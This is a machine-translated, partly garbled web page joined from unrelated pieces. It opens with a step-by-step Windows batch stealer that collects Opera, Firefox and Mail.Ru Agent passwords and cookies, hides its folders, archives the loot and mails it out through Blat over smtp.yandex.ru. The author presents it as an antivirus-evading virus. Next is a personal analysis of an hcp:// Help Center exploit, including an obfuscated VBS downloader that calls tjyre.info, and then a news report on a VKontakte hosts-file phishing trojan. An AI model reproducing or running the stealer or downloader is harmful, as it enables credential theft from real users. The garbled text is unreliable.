md %SystemDrive%\pass\MailAgent\- skapar en MailAgent-mapp till vilken filer som innehåller korrespondenshistorik och registernycklar (lagring av lösenord) från Mail Agent kommer att kopieras.
md %SystemDrive%\pass\MailAgent\reg- skapar en mappreg
attrib %systemrot%\wincs +h +s +r- lägger attribut på wincs-mappen och döljer den därigenom.
attribut %SystemDrive%\pass +h +s +r- samma som ovan.
kopiera /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- kopierar blat.exe-filen från nedladdningsplatsen till wincs-mappen
kopiera /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- kopierar blat.dll-filen från nedladdningsplatsen till wincs-mappen
kopiera /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- kopierar blat.lib-filen från nedladdningsplatsen till wincs-mappen
CD /D %APPDATA%\Opera\Opera\ - går till opera-mappen där filer med lösenord (och inte bara) från operan finns.
kopiera /y wand.dat %SystemDrive%\pass\opera\wand.dat- kopierar wand.dat-filen till opera-mappen
kopiera /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- kopierar filen cookie4.dat till opera-mappen
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exporterar registernyckeln magent_logins2 där lösenordet är lagrat till reg-mappen
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exporterar registernyckeln magent_logins3 där lösenordet är lagrat till reg-mappen
CD / D %APPDATA% - gå till mappen AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- kopierar innehållet i mappen Mra\Base till mappen MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- kopierar ver.txt-filen till mappen MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- gå till mappen med Mozilla webbläsarprofil
kopiera /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- kopierar filen cookies.sqlite till Mozilla-mappen
kopiera /y key3.db %SystemDrive%\pass\Mozilla\key3.db- kopierar filen key3.db till Mozilla-mappen
kopiera /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- kopierar filen signons.sqlite till Mozilla-mappen
kopiera /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- kopierar WinRar Rar.exe-arkiveringskomponenten till pass-mappen
del /s /q %SystemRoot%\Rar.exe- tar bort arkiveringskomponenten från Windows-mappen
%SystemDrive%\pass\rar.exe och -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- arkivera innehållet i passmappen
kopiera /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar kopiera det skapade arkivet till wincs-mappen
cd %systemroot%\wincs - gå till mappen wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Lösenord - förbereder Blat-programmet för att skicka arkivet genom att ange data för auktorisering och skicka brevet Glöm inte att ange dina data från brevlådan från vilken brevet med arkivet kommer att vara skickas.
ren *.rar pass.rar - ifall arkivet inte tog fel namn under processen, kommer vi att byta namn på det till pass.rar igen
%systemroot%\wincs\blat.exe -body Filer Lösenord -till [email protected] -bifoga %systemrot%\wincs\pass.rar- ange till vilken postadress brevet kommer att skickas och skicka det.
rmdir /s /q %SystemDrive%\pass- radera passmappen
rmdir /s /q %systemrot%\wincs- radera wincs-mappen
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- ta bort Blat-komponenterna från Windows-mappen.
del /s /q %systemrot%\blat.lib- ta bort Blat-komponenterna från Windows-mappen.
attrib +a +s +h +r %systemroot%\wind.exe- vi sätter attribut på oss själva och gömmer oss därigenom för ögonen.
AVSLUTA - slutför batinkprocessen och avsluta.
cls - rensa utdata från alla rader i intraperatorn.
Vi kopierade det, sparade det som wind.bat och kompilerade det till exe med hjälp av Bat to exe-konverteringsprogrammet, sedan satte vi ihop allt, det vill säga vi tar komponenterna i Blat-programmet och WinRar-arkiveringskomponenten (du kan ladda ner det ) och limma in den i en körbar fil, eller med vilket program som helst, sökvägen för att ladda ner alla filer måste vara %SystemRoot% eller %WindowsDir% eller %windir% .
Som ett resultat får vi ett virus som inte avfyras av antivirus och skickar ett arkiv med filer till din post. Filerna som kommer till posten kan dekrypteras med hjälp av återställning med flera lösenord, dock inte alla, utan bara trollstaven .dat från operan, och sedan om den inte uppdaterades till 11 * versioner Alla andra filer kan dekrypteras genom att ersätta dem med dina egna.
Jag tror att detta är slutet på det, om du har några frågor är du välkommen att fråga.
Tack för din uppmärksamhet, allt gott!
©Swap TheHackWorld.in

Sedan barndomen har jag plågats av frågan: "Hur blir en dator infekterad med virus." Till slut fick jag reda på det, kände efter mig själv. Varför inte berätta för världen om hur denna mycket underhållande process faktiskt äger rum.

För att inte skriva en manual om infektion, annars kommer många att utnyttja, gud förbjude, så jag raderar några skriptbitar.

Alla är förmodligen trötta på fraserna om "läckage" i MS Windows, men det är fortfarande det vanligaste systemet på planeten Jorden. Eller så kanske systemet är så fullt av hål på grund av dess utbredning.

Och nu utfördes attacken på en av sårbarheterna Windows-system XP, nämligen Windows Hjälpcenter.

Början, som vanligt, var för länge sedan (redan 2010), du kan läsa om detta på den mycket välkända resursen xakep.ru (längst ner på sidan).

Allt började enkelt.

IE utfärdade en begäran om att öppna programmet, från tjyre .info-resursen. Helt klart ett virus! Men det är intressant!!

Gå till webbplatsen http://tjyre.info ger ingen information, förutom att sidan är under utveckling (vid tidpunkten för inlägget fungerar det bara inte, tydligen har de skruvat ihop det).

Hur tar jag reda på vad som var avsett för mig på datorn? Elementärt – du måste tänka på vart länken leder.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% %A ... %%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=

Som min okunnighet säger mig är länken till virusfilen gömd bakom siffrorna.

Genom enkla transformationer visar det sig att siffrorna döljer kopieringen av ett skript med filnamnet l .vbs till systemmappen på min dator, och dess efterföljande lansering.

Adressen där skriptet finns på nätverket:


http://tjyre.info/games/hcp_vbs.php?f=17

Filen som öppnas innehåller följande text:

« w=3000:x=200:y=1:z=false:a = " http://tjyre.info/u.php?e=7&f=17":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02 -16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) … Borttagen av dumma skäl...g =o.Få fil(b):g.Radera»

Texten är ganska enkel:

    vi ser datumet 2010-02-16 (det visar sig att en viss maskering av viruset efter datum utförs, samtidigt som de antog det att det är nödvändigt att maskera)

    vi ser kommandona vända ut och in (med hjälp av en omvänd), med hjälp av vilken virusfilen flyger in på vår dator.

Sätt dig säkert ner fresh readme.exe. Vad ger den här gästen oss? Förmodligen mycket roligt.

Kör readme. ex blockerades mycket framgångsrikt av programmet antiwinlocker . Vilket hon hedras och prisas för. Men eftersom jag ändå vill se vad som händer så måste försvararna bli ombedda att lägga av ett tag.

Den första lanseringen av viruset var inte anmärkningsvärt, vilket är förståeligt, viruset trängde in och gömde sig tills nästa start.

Vi startar om och återigen tystnar. Mysterium!!

Vi får leta i hemliga hörn.

Vi hittar i mappen "C:\Documents and Settings\Admin\Application Data" filen lsass.exe (simulerar systemprocessen).

I registret hittar vi nyckeln:

"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe" som förväntat.

Men det är inte allt!

I mappen "C:\WINDOWS\system32\drivers\etc" finns en magi värdfil, där viruset lägger till ett dussin magiska rader (vänligen se HELA hosts-filen):

Med hjälp av dessa rader görs en omdirigering från Odnoklassniki- och vkontakte-webbplatserna till en helt specifik webbplats, och en fullständig bummer ordnas för Kaspersky-uppdateringar (viruset liknar Trojan.Win32.Ddox.ci).

Vad ser vi när vi går till skurkens hemsida? Vi ser hemsida klasskamrater, men om du anger ett användarnamn och lösenord så går de direkt till "skurken". Och klickar du på någon länk får du en väldigt cool förfrågan om "kontovalidering". Och texten säger tydligt: Tjänsten är inte tillgänglig för abonnenter i vissa regioner i MegaFon En sådan seriös inställning till affärer att jag inte omedelbart gick in på meningen med frasen.

Ett ondskefullt virus har dykt upp som ersätter vissa inställningar (modifierar hosts-filen) på användarens dator, vilket gör att du överhuvudtaget hamnar på fel ställe, även om allt utåt ser ut som vanligt. Det är här du anger ditt lösenord och ger skurkarna ditt namn och lösenord. Det är allt.

Detaljer och hur man slåss läs under klippet.

VKontakte: 50 000 gratis lösenord (uppdaterat)

Ett datorvirus för Windows-operativsystemet har dykt upp på Internet, som hackar kontona för användare av det sociala nätverket VKontakte.

Trojanen fungerar enligt följande princip: den modifierar hosts-filen (som finns i C:\WINDOWS\system32\drivers\etc\) på ett sådant sätt att när en användare försöker komma åt sitt sociala favoritnätverk, öppnar hans datorwebbläsare en tvillingplats; som ett resultat av detta läggs e-postadressen och lösenordet till i databasen över stulna konton omedelbart efter att ha angetts på en falsk resurs.

Filen på 4,2 megabyte innehåller flera tiotusentals giltiga adresser och lösenord. Inledningsvis rapporterades 130 eller till och med 150 tusen hackade konton, men genom att kassera upprepade kombinationer fick vi reda på att det finns två till två och en halv gånger färre av dem. (Vilket dock också är imponerande.) Det är också känt att användare av nätverket Odnoklassniki kan bli attackerade inom en snar framtid: hackare har redan skapat en motsvarande fil för sina data, men för närvarande är den tom.

Vi bad specialister från antivirusföretag att kommentera situationen, samt att prata om liknande attacker.

Denis Maslennikov, antivirusexpert på Kaspersky Lab: Data släpptes idag konton mer än 130 tusen användare av det populära ryska sociala nätverket VKontakte. Informationen publicerades på en av hackersajterna. Våra experter har analyserat dessa uppgifter och bekräftar kompromissen. Enligt vår information ser händelsen ut så här: webbplatsen som anges i meddelandet — 83.133.120.252 — är känd för Kaspersky Lab som en nätfiske och blockeras när personliga produkter försöker komma åt den.

Trojan.Win32.VkHost.an skadlig kod (upptäckt av oss sedan 28 juli) distribuerades via VKontakte-applikationen (hxxp://vkontakte.ru/app711384?&m=2, för närvarande blockerad av resursadministrationen). Efter att ha installerats i systemet ersatte den här trojanen hosts-filen med följande:
83.133.120.252 vkontakte.ru
83.133.120.252 odnoklassniki.ru

Sedan, när en användare försökte öppna en av dessa sociala nätverkssajter, omdirigerades de till en nätfiskesida där de var tvungna att logga in. Inloggningen och lösenordet gick till databaserna på samma sida 83.133.120.252. För tillfället är Odnoklassniki-databasen tom, så det är för tidigt att prata om att kompromissa med användardata och detta sociala nätverk.

Efter att användaren loggat in på den falska sidan blev det en omdirigering – först till en ny sida. Denna sida innehåller följande text:

« UPPMÄRKSAMHET! Ditt konto har identifierats av systemet som potentiellt farligt. Spam skickas från din IP-adress. Kontot erkänns som ett falskt skapat av cyberbrottslingar för skräppostutskick och kommer att raderas 24 timmar efter att ha läst detta meddelande, i händelse av vägran att bekräfta kontot. Om kontot är verkligt måste det verifieras. Skicka ett SMS med texten orderit30193 (utan mellanslag), du får en aktiveringskod som svar på numret 6008. Kostnaden för SMS motsvarar kostnaden för din tariffplan.»

Vad som är mest intressant, om användaren skickar ett SMS, får han verkligen en viss kod, eftersom webbplatsen har sidor med följande innehåll:

« Koden accepteras! Ladda ner och kör filen - Ladda ner.»

« Du matade in en felaktig kod. Gå tillbaka och ange koden från SMS-meddelandet!»

Vi rekommenderar att alla VKontakte- och Odnoklassniki-användare kontrollerar innehållet i sina värdfiler, som finns i katalogen %windir%\system32\drivers\etc, och om de innehåller länkar till vkontakte.ru och odnoklassniki.ru, radera dem.

Se till att ändra alla lösenord för alla konton i i sociala nätverk. Om du hamnar på sådana nätfiskesidor ska du inte i något fall ange ditt användarnamn och lösenord och inte skicka några SMS.

Angripare använder ganska ofta värdfilspoofing för att omdirigera användare till nätfiskewebbsidor. Tyvärr bär en sådan primitiv metod ibland frukt för brottslingar. Om vi ​​pratar om sådana system för att attackera onlinebankanvändare, är de mest populära i Latinamerika.

Grigory Vasiliev, CTO för ESET: Tillgång till vkontakte.ru-konton erhölls med hjälp av en pharmingattack - omdirigering av offret till en falsk IP-adress genom att göra ändringar i värdfilen. Användaren går in på en dummysida skapad av en angripare, och den senare fångar upp lösenord till sin konton. I det här fallet kanske offret inte gissar något, eftersom den utåtriktade falska sidan inte skiljer sig från den verkliga.

Sådana attacker används oftast där riktiga pengar är inblandade. Därför har användningen av pharming i nätbanker blivit den mest utbredda. Moderna antivirusprodukter som använder HIPS-teknik i kombination med heuristisk analys kan effektivt skydda användare från skadlig programvara som försöker modifiera hosts-filen, även om det är ett nytt okänt hot.

Tillägg: Uppenbarligen ersatte de anställda på VKontakte med tvång lösenorden för alla "lyckliga". Detta steg är utan tvekan korrekt med en varning: det löser inte helt problemet. När allt kommer omkring kommer många av oss bara på ett lösenord för alla tillfällen, och i så fall har ägarna av filen med databasen det bredaste utrymmet för experiment ...

Tillägg 2: Kaspersky Lab inbjuder användare av de sociala nätverken VKontakte och Odnoklassniki att kontrollera om deras registreringsdata har hamnat i händerna på inkräktare. Detta kan göras på en speciell sida i företagets informationsportal. Låt VKontakte-anställda ändra lösenorden för de berörda användarna, ta reda på om din adress finns i databasen (som förresten för närvarande inte är tillgänglig på sin gamla adress), är fortfarande värt det.

Om svaret är positivt måste du rengöra hosts-filen och ordna en total antivirusgenomsökning av datorn. Och en sak till: om du använde samma lösenord på alla besökta resurser - sociala nätverk, posttjänster, ICQ och så vidare, måste du ändra det omedelbart. De som vill ta över resten av dina konton (till exempel genom att försöka ange ditt gamla lösenord från VKontakte på Odnoklassniki) kan vara mycket mer än det verkar.

Så här delar du med vänner:
Liknande inlägg